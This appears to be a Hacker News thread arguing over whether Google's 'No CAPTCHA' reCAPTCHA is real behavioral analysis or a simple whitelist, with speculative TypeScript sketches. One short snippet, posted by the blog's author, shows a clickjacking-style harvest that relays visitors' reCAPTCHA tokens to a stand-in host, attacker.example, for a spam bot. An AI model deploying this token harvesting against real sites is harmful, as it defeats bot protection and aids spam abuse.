Seriously, guys? This made it to the top of the front page?
First of all, to all the people saying "HUR DUR GOOGLE WANTS YOUR BROWSING DATA": they already have it, and have had it, for a looong time.
Secondly, if you tell me that one dude [the author] dismissed over a year of work by Google's engineering team as flawed, reducing it to [So what Google is trying to sell us as a comprehensive bot detecting algorithm is simply a whitelist based on your previous online behavior, CAPTCHAs you solved.], and that you believe him, I would question your intelligence.
This is supposed to be a tech-savvy community, at least to some degree. What the fuck.
Now, Google's blog post reads: [Advanced Risk Analysis backend for reCAPTCHA that actively considers a user’s entire engagement with the CAPTCHA—before, during, and after—to determine whether that user is a human.]
[However, CAPTCHAs aren't going away just yet. In cases when the risk analysis engine can't confidently predict whether a user is a human or an abusive agent, it will prompt a CAPTCHA to elicit more cues, increasing the number of security checkpoints to confirm the user is valid.]
So my guess would be that they analyze the user's behaviour on the page where the CAPTCHA is located - things like mouse movements, the time it takes to type out the words, spelling mistakes being corrected, and whatever else humans do differently from bots - and only then combine that with your historical cookies. Maybe it is much more complicated than that; I don't know the details, and neither do you.
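To make my guess concrete, here is a purely speculative sketch (TypeScript) of the kind of client-side signals such a system could collect. Every name here is made up to illustrate the idea; none of it is confirmed Google behavior:

    // Speculative illustration only, not Google's actual implementation.
    // Records mouse movement and typing rhythm so a backend could score
    // how "human" the interaction on the page looks.
    interface BehaviorSignals {
      mouseSamples: { x: number; y: number; t: number }[];
      keyIntervalsMs: number[]; // gaps between keystrokes; bots tend to be unnaturally uniform
      corrections: number;      // Backspace presses, a rough proxy for fixed typos
    }

    const signals: BehaviorSignals = { mouseSamples: [], keyIntervalsMs: [], corrections: 0 };
    let lastKeyAt = 0;

    document.addEventListener("mousemove", (e) => {
      signals.mouseSamples.push({ x: e.clientX, y: e.clientY, t: performance.now() });
    });

    document.addEventListener("keydown", (e) => {
      const now = performance.now();
      if (lastKeyAt > 0) signals.keyIntervalsMs.push(now - lastKeyAt);
      lastKeyAt = now;
      if (e.key === "Backspace") signals.corrections++;
    });
    // The widget would then ship `signals`, combined with your historical
    // cookies, to a risk-analysis backend for scoring.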
Do you really think they would go ahead and implement such a system without rigorously testing its effectiveness? I am sure they tested it extensively with users AND with bots, decided it is better than the current system, and ONLY then deployed it.
Rant off.
>So my guess would be that they analyze the user's behaviour on the page where the CAPTCHA is located - things like mouse movements
If they can track mouse movements, why am I no longer a human to them in incognito mode? I was expecting the same, but from what I see it's just a whitelist. And that's OK. The problem, which you probably didn't care to read about, is that it's vulnerable to simple clickjacking, which opens another weakness: I can use your click on my page to get your reCAPTCHA token and feed it to my spam bot.
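Concretely, the harvesting half of the attack looks roughly like this (a minimal sketch using the documented grecaptcha.render() API; the decoy element and harvest endpoint are of course invented):

    // Sketch: the attacker's page renders the widget under the TARGET
    // site's public sitekey. A real visitor's click mints a "human"
    // token, which the callback relays to the spam bot.
    declare const grecaptcha: {
      render(
        el: HTMLElement,
        opts: { sitekey: string; callback: (token: string) => void }
      ): number;
    };

    grecaptcha.render(document.getElementById("decoy")!, {
      sitekey: "TARGET_SITE_PUBLIC_KEY", // hypothetical placeholder
      callback: (token) => {
        // Your click on my page just produced a human-grade token.
        fetch("https://attacker.example/harvest", { method: "POST", body: token });
      },
    });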
I'm actually happy with No CAPTCHA, because it's progress. But it's not good enough (see the rest of the comments; it could be a background AJAX request instead).
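To be clear about what I mean by a background AJAX request: no checkbox at all, just a silent call that returns a verdict, with a visible challenge only as a fallback. A sketch with an invented endpoint and response shape:

    // Invented endpoint and response shape; just illustrating the idea
    // of verifying silently instead of asking for a click.
    async function verifySilently(siteKey: string): Promise<boolean> {
      const res = await fetch("https://captcha.example/risk-check?sitekey=" + siteKey, {
        credentials: "include", // let the risk engine see its own cookies
      });
      const verdict: { human: boolean } = await res.json();
      return verdict.human; // show a visible challenge only when this is false
    }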
So what do you think about the clickjacking issue? I made an assumption about their algorithm, and maybe I'm wrong and they do track your mouse, but there's an exploitable weakness either way. My post says two things: 1) your algorithm seems simpler than advertised, and 2) here's a bug in it.
The curious thing is, I could not replicate the clickjacking issue. Every time I click on the original WordPress registration page, I am verified as human immediately.
If I click on your GitHub page, I get a challenge. My clicks were never accepted as human on your GitHub page, and always accepted as human on the WordPress page.
Since you obviously don't know who Homakov is, I can't take your post very seriously.
Homakov has exposed several serious security flaws at Facebook and Google before. I'm pretty sure Google is actively trying to headhunt him since he is one of the best in the web security field.
He's probably best known to HN for his GitHub exploit with Rails in 2012. I wrote a profile of him earlier this year (http://jobtipsforgeeks.com/2014/03/27/homakov/) which talks about his background a bit more.
> Do you really think they would go ahead and implement such a system without rigorously testing its effectiveness? I am sure they tested it extensively with users AND with bots, decided it is better than the current system, and ONLY then deployed it.
I think the gap between the marketing material for No CAPTCHA (a simplified website, a YouTube video with animations) and the seemingly lacking actual implementation is why this blog post was relevant to me.
Like other tech people around here, I was hyped up by the "smarts" of a system that uses cursor detection etc. to silently validate that I am a human. This blog post seems to indicate that the validation is a much simpler matter of previously passed tests and the amount of data that Google has associated with the user.
That's exactly why I wrote this post. I wish Google would prove me wrong and show us how they use cool tech to detect bots, instead of user.isGoogleUser? and user.acceptedCaptchas > 5.
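Spelled out, the caricature I have in mind is nothing fancier than this (deliberately oversimplified, and obviously not Google's real code):

    // Deliberately oversimplified caricature, not Google's real code.
    interface User {
      isGoogleUser: boolean;
      acceptedCaptchas: number;
    }

    function looksHuman(user: User): boolean {
      // "A whitelist based on your previous online behavior."
      return user.isGoogleUser && user.acceptedCaptchas > 5;
    }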
>>>So what Google is trying to sell us as a comprehensive bot detecting algorithm is simply a whitelist based on your previous online behavior, CAPTCHAs you solved.
That is a bold statement, something presented as a fact, not a hypothesis.
Google's blog post says that 98-something percent of the old distorted text could be deciphered by AI. My point is that, regardless of the new system's vulnerabilities, I am certain it is more effective than the old alternative. They would have tested it.